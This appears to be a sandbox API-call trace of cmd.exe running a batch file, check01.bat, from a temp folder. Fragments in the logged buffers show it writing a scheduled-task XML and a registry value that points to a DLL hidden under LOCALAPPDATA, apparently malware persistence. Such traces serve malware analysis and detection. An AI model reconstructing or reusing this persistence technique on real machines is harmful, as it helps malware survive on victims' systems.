[0377.842] SetFilePointer (in: hFile=0x64, lDistanceToMove=-1, lpDistanceToMoveHigh=0x1ef2d8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1ef2d8*=0) returned 0x10e
[0377.842] ReadFile (in: hFile=0x64, lpBuffer=0x1ef2c8, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1ef270, lpOverlapped=0x0 | out: lpBuffer=0x1ef2c8*, lpNumberOfBytesRead=0x1ef270*=0x1, lpOverlapped=0x0) returned 1
[0377.842] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0377.843] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x21cc60, Size=0x3e) returned 0x21cc60
[0377.843] GetProcessHeap () returned 0x200000
[0377.843] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x21cc60) returned 0x3e
[0377.843] _vsnwprintf (in: _Buffer=0x4a296340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x1ef098 | out: _Buffer=" \r\n") returned 22
[0377.843] _get_osfhandle (_FileHandle=1) returned 0x64
[0377.843] GetFileType (hFile=0x64) returned 0x1
[0377.843] _get_osfhandle (_FileHandle=1) returned 0x64
[0377.843] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr=" \r\n", cchWideChar=-1, lpMultiByteStr=0x4a28c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \r\n", lpUsedDefaultChar=0x0) returned 23
[0377.843] WriteFile (in: hFile=0x64, lpBuffer=0x4a28c320*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x1ef068, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesWritten=0x1ef068*=0x16, lpOverlapped=0x0) returned 1
[0377.847] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0377.849] _close (_FileHandle=3) returned 0
[0377.850] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.850] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0377.851] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.851] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0377.851] _get_osfhandle (_FileHandle=0) returned 0x3
[0377.851] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0377.852] SetConsoleInputExeNameW () returned 0x1
[0377.852] GetConsoleOutputCP () returned 0x1b5
[0377.853] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0377.853] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0377.853] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0377.853] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0377.853] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.853] SetFilePointer (in: hFile=0x64, lDistanceToMove=872, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x368
[0377.854] GetProcessHeap () returned 0x200000
[0377.854] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2286e0 | out: hHeap=0x200000) returned 1
[0377.854] GetProcessHeap () returned 0x200000
[0377.854] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cc60 | out: hHeap=0x200000) returned 1
[0377.854] GetProcessHeap () returned 0x200000
[0377.855] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b090 | out: hHeap=0x200000) returned 1
[0377.855] GetProcessHeap () returned 0x200000
[0377.855] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cbf0 | out: hHeap=0x200000) returned 1
[0377.855] GetProcessHeap () returned 0x200000
[0377.855] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d30 | out: hHeap=0x200000) returned 1
[0377.855] GetProcessHeap () returned 0x200000
[0377.855] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x228690 | out: hHeap=0x200000) returned 1
[0377.855] GetProcessHeap () returned 0x200000
[0377.855] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0377.856] GetProcessHeap () returned 0x200000
[0377.856] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0377.856] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.856] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x368
[0377.857] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0xbca, lpOverlapped=0x0) returned 1
[0377.857] SetFilePointer (in: hFile=0x64, lDistanceToMove=907, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x38b
[0377.857] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=35, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\n%\\a.xml\r\ntemp%\\a.xml\r\ntemp%\\a.xml\r\ns/2004/02/mit/task\"^> >> %temp%\\a.xml\r\nG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 35
[0377.858] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.858] GetFileType (hFile=0x64) returned 0x1
[0377.858] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.858] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x38b
[0377.858] GetProcessHeap () returned 0x200000
[0377.859] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x22d3d0
[0377.859] GetProcessHeap () returned 0x200000
[0377.859] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x2313f0
[0377.859] GetProcessHeap () returned 0x200000
[0377.859] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b0c0
[0377.860] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0377.860] GetProcessHeap () returned 0x200000
[0377.860] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0377.861] GetProcessHeap () returned 0x200000
[0377.861] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2313f0 | out: hHeap=0x200000) returned 1
[0377.861] GetProcessHeap () returned 0x200000
[0377.862] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x22d3d0 | out: hHeap=0x200000) returned 1
[0377.862] _tell (_FileHandle=3) returned 907
[0377.862] _close (_FileHandle=3) returned 0
[0377.863] _wcsicmp (_String1="echo", _String2="DIR") returned 1
[0377.863] _wcsicmp (_String1="echo", _String2="ERASE") returned -15
[0377.863] _wcsicmp (_String1="echo", _String2="DEL") returned 1
[0377.863] _wcsicmp (_String1="echo", _String2="TYPE") returned -15
[0377.863] _wcsicmp (_String1="echo", _String2="COPY") returned 2
[0377.863] _wcsicmp (_String1="echo", _String2="CD") returned 2
[0377.863] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2
[0377.864] _wcsicmp (_String1="echo", _String2="RENAME") returned -13
[0377.864] _wcsicmp (_String1="echo", _String2="REN") returned -13
[0377.864] _wcsicmp (_String1="echo", _String2="ECHO") returned 0
[0377.864] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.864] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.864] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.864] GetFileType (hFile=0x7) returned 0x2
[0377.865] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0377.865] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef2c8 | out: lpMode=0x1ef2c8) returned 1
[0377.867] _dup (_FileHandle=1) returned 3
[0377.868] _close (_FileHandle=1) returned 0
[0377.869] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml", _String2="con") returned -53
[0377.870] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\a.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x1ef278, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0377.870] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 1
[0377.870] _get_osfhandle (_FileHandle=1) returned 0x64
[0377.870] GetFileType (hFile=0x64) returned 0x1
[0377.871] GetFileSize (in: hFile=0x64, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x125
[0377.871] SetFilePointer (in: hFile=0x64, lDistanceToMove=-1, lpDistanceToMoveHigh=0x1ef2d8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1ef2d8*=0) returned 0x124
[0377.871] ReadFile (in: hFile=0x64, lpBuffer=0x1ef2c8, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1ef270, lpOverlapped=0x0 | out: lpBuffer=0x1ef2c8*, lpNumberOfBytesRead=0x1ef270*=0x1, lpOverlapped=0x0) returned 1
[0377.871] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0377.872] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x228690, Size=0x28) returned 0x21b150
[0377.872] GetProcessHeap () returned 0x200000
[0377.872] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x21b150) returned 0x28
[0377.872] _vsnwprintf (in: _Buffer=0x4a296340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x1ef098 | out: _Buffer=" \r\n") returned 13
[0377.873] _get_osfhandle (_FileHandle=1) returned 0x64
[0377.873] GetFileType (hFile=0x64) returned 0x1
[0377.873] _get_osfhandle (_FileHandle=1) returned 0x64
[0377.873] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr=" \r\n", cchWideChar=-1, lpMultiByteStr=0x4a28c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \r\n", lpUsedDefaultChar=0x0) returned 14
[0377.873] WriteFile (in: hFile=0x64, lpBuffer=0x4a28c320*, nNumberOfBytesToWrite=0xd, lpNumberOfBytesWritten=0x1ef068, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesWritten=0x1ef068*=0xd, lpOverlapped=0x0) returned 1
[0377.873] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0377.876] _close (_FileHandle=3) returned 0
[0377.877] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.877] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0377.878] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.878] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0377.879] _get_osfhandle (_FileHandle=0) returned 0x3
[0377.879] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0377.880] SetConsoleInputExeNameW () returned 0x1
[0377.880] GetConsoleOutputCP () returned 0x1b5
[0377.881] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0377.881] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0377.881] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0377.881] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0377.882] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.882] SetFilePointer (in: hFile=0x64, lDistanceToMove=907, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x38b
[0377.882] GetProcessHeap () returned 0x200000
[0377.882] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216db0 | out: hHeap=0x200000) returned 1
[0377.882] GetProcessHeap () returned 0x200000
[0377.883] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b150 | out: hHeap=0x200000) returned 1
[0377.883] GetProcessHeap () returned 0x200000
[0377.883] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b090 | out: hHeap=0x200000) returned 1
[0377.883] GetProcessHeap () returned 0x200000
[0377.883] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cbf0 | out: hHeap=0x200000) returned 1
[0377.883] GetProcessHeap () returned 0x200000
[0377.883] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d70 | out: hHeap=0x200000) returned 1
[0377.883] GetProcessHeap () returned 0x200000
[0377.883] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d30 | out: hHeap=0x200000) returned 1
[0377.883] GetProcessHeap () returned 0x200000
[0377.883] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0377.883] GetProcessHeap () returned 0x200000
[0377.883] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0377.884] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.884] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x38b
[0377.884] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0xba7, lpOverlapped=0x0) returned 1
[0377.884] SetFilePointer (in: hFile=0x64, lDistanceToMove=946, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3b2
[0377.885] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=39, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\nxml\r\ntemp%\\a.xml\r\ntemp%\\a.xml\r\ns/2004/02/mit/task\"^> >> %temp%\\a.xml\r\nG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 39
[0377.885] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.885] GetFileType (hFile=0x64) returned 0x1
[0377.885] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.885] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3b2
[0377.885] GetProcessHeap () returned 0x200000
[0377.885] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x22d3d0
[0377.885] GetProcessHeap () returned 0x200000
[0377.886] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x2313f0
[0377.886] GetProcessHeap () returned 0x200000
[0377.886] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b0c0
[0377.886] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0377.886] GetProcessHeap () returned 0x200000
[0377.886] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0377.886] GetProcessHeap () returned 0x200000
[0377.887] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2313f0 | out: hHeap=0x200000) returned 1
[0377.887] GetProcessHeap () returned 0x200000
[0377.887] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x22d3d0 | out: hHeap=0x200000) returned 1
[0377.887] _tell (_FileHandle=3) returned 946
[0377.887] _close (_FileHandle=3) returned 0
[0377.888] _wcsicmp (_String1="echo", _String2="DIR") returned 1
[0377.888] _wcsicmp (_String1="echo", _String2="ERASE") returned -15
[0377.888] _wcsicmp (_String1="echo", _String2="DEL") returned 1
[0377.888] _wcsicmp (_String1="echo", _String2="TYPE") returned -15
[0377.888] _wcsicmp (_String1="echo", _String2="COPY") returned 2
[0377.888] _wcsicmp (_String1="echo", _String2="CD") returned 2
[0377.888] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2
[0377.888] _wcsicmp (_String1="echo", _String2="RENAME") returned -13
[0377.888] _wcsicmp (_String1="echo", _String2="REN") returned -13
[0377.889] _wcsicmp (_String1="echo", _String2="ECHO") returned 0
[0377.889] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.889] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.889] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.889] GetFileType (hFile=0x7) returned 0x2
[0377.890] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0377.890] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef2c8 | out: lpMode=0x1ef2c8) returned 1
[0377.891] _dup (_FileHandle=1) returned 3
[0377.892] _close (_FileHandle=1) returned 0
[0377.893] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml", _String2="con") returned -53
[0377.893] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\a.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x1ef278, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0377.893] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 1
[0377.893] _get_osfhandle (_FileHandle=1) returned 0x64
[0377.893] GetFileType (hFile=0x64) returned 0x1
[0377.894] GetFileSize (in: hFile=0x64, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x132
[0377.894] SetFilePointer (in: hFile=0x64, lDistanceToMove=-1, lpDistanceToMoveHigh=0x1ef2d8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1ef2d8*=0) returned 0x131
[0377.894] ReadFile (in: hFile=0x64, lpBuffer=0x1ef2c8, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1ef270, lpOverlapped=0x0 | out: lpBuffer=0x1ef2c8*, lpNumberOfBytesRead=0x1ef270*=0x1, lpOverlapped=0x0) returned 1
[0377.894] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0377.894] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x219a30, Size=0x30) returned 0x219a30
[0377.895] GetProcessHeap () returned 0x200000
[0377.895] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x219a30) returned 0x30
[0377.895] _vsnwprintf (in: _Buffer=0x4a296340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x1ef098 | out: _Buffer=" \r\n") returned 17
[0377.895] _get_osfhandle (_FileHandle=1) returned 0x64
[0377.895] GetFileType (hFile=0x64) returned 0x1
[0377.895] _get_osfhandle (_FileHandle=1) returned 0x64
[0377.895] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr=" \r\n", cchWideChar=-1, lpMultiByteStr=0x4a28c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \r\n", lpUsedDefaultChar=0x0) returned 18
[0377.895] WriteFile (in: hFile=0x64, lpBuffer=0x4a28c320*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x1ef068, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesWritten=0x1ef068*=0x11, lpOverlapped=0x0) returned 1
[0377.895] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0377.898] _close (_FileHandle=3) returned 0
[0377.899] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.900] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0377.900] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.900] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0377.901] _get_osfhandle (_FileHandle=0) returned 0x3
[0377.901] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0377.902] SetConsoleInputExeNameW () returned 0x1
[0377.902] GetConsoleOutputCP () returned 0x1b5
[0377.902] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0377.902] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0377.903] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0377.903] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0377.903] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.903] SetFilePointer (in: hFile=0x64, lDistanceToMove=946, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3b2
[0377.903] GetProcessHeap () returned 0x200000
[0377.903] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x228690 | out: hHeap=0x200000) returned 1
[0377.903] GetProcessHeap () returned 0x200000
[0377.904] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x219a30 | out: hHeap=0x200000) returned 1
[0377.904] GetProcessHeap () returned 0x200000
[0377.904] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b090 | out: hHeap=0x200000) returned 1
[0377.904] GetProcessHeap () returned 0x200000
[0377.904] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cbf0 | out: hHeap=0x200000) returned 1
[0377.904] GetProcessHeap () returned 0x200000
[0377.904] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d70 | out: hHeap=0x200000) returned 1
[0377.904] GetProcessHeap () returned 0x200000
[0377.904] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d30 | out: hHeap=0x200000) returned 1
[0377.904] GetProcessHeap () returned 0x200000
[0377.904] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0377.904] GetProcessHeap () returned 0x200000
[0377.904] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0377.905] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.905] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3b2
[0377.905] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0xb80, lpOverlapped=0x0) returned 1
[0377.905] SetFilePointer (in: hFile=0x64, lDistanceToMove=1000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3e8
[0377.905] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^%USERNAME%^ >> %temp%\\a.xml\r\n", cbMultiByte=54, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="echo ^%USERNAME%^ >> %temp%\\a.xml\r\nl\r\ntemp%\\a.xml\r\ns/2004/02/mit/task\"^> >> %temp%\\a.xml\r\nG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 54
[0377.906] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.906] GetFileType (hFile=0x64) returned 0x1
[0377.906] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.906] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3e8
[0377.906] GetProcessHeap () returned 0x200000
[0377.906] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x22d3d0
[0377.906] GetProcessHeap () returned 0x200000
[0377.906] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x2313f0
[0377.906] GetProcessHeap () returned 0x200000
[0377.907] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x22) returned 0x21b0c0
[0377.907] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x9
[0377.907] GetProcessHeap () returned 0x200000
[0377.907] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0377.907] GetProcessHeap () returned 0x200000
[0377.907] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2313f0 | out: hHeap=0x200000) returned 1
[0377.907] GetProcessHeap () returned 0x200000
[0377.907] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x2313f0
[0377.907] GetProcessHeap () returned 0x200000
[0377.908] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b0c0
[0377.908] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0377.908] GetProcessHeap () returned 0x200000
[0377.908] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0377.908] GetProcessHeap () returned 0x200000
[0377.908] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2313f0 | out: hHeap=0x200000) returned 1
[0377.908] GetProcessHeap () returned 0x200000
[0377.908] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x22d3d0 | out: hHeap=0x200000) returned 1
[0377.909] _tell (_FileHandle=3) returned 1000
[0377.909] _close (_FileHandle=3) returned 0
[0377.909] _wcsicmp (_String1="echo", _String2="DIR") returned 1
[0377.909] _wcsicmp (_String1="echo", _String2="ERASE") returned -15
[0377.909] _wcsicmp (_String1="echo", _String2="DEL") returned 1
[0377.909] _wcsicmp (_String1="echo", _String2="TYPE") returned -15
[0377.909] _wcsicmp (_String1="echo", _String2="COPY") returned 2
[0377.909] _wcsicmp (_String1="echo", _String2="CD") returned 2
[0377.909] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2
[0377.909] _wcsicmp (_String1="echo", _String2="RENAME") returned -13
[0377.910] _wcsicmp (_String1="echo", _String2="REN") returned -13
[0377.910] _wcsicmp (_String1="echo", _String2="ECHO") returned 0
[0377.910] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.910] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.910] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.910] GetFileType (hFile=0x7) returned 0x2
[0377.911] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0377.911] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef2c8 | out: lpMode=0x1ef2c8) returned 1
[0377.912] _dup (_FileHandle=1) returned 3
[0377.913] _close (_FileHandle=1) returned 0
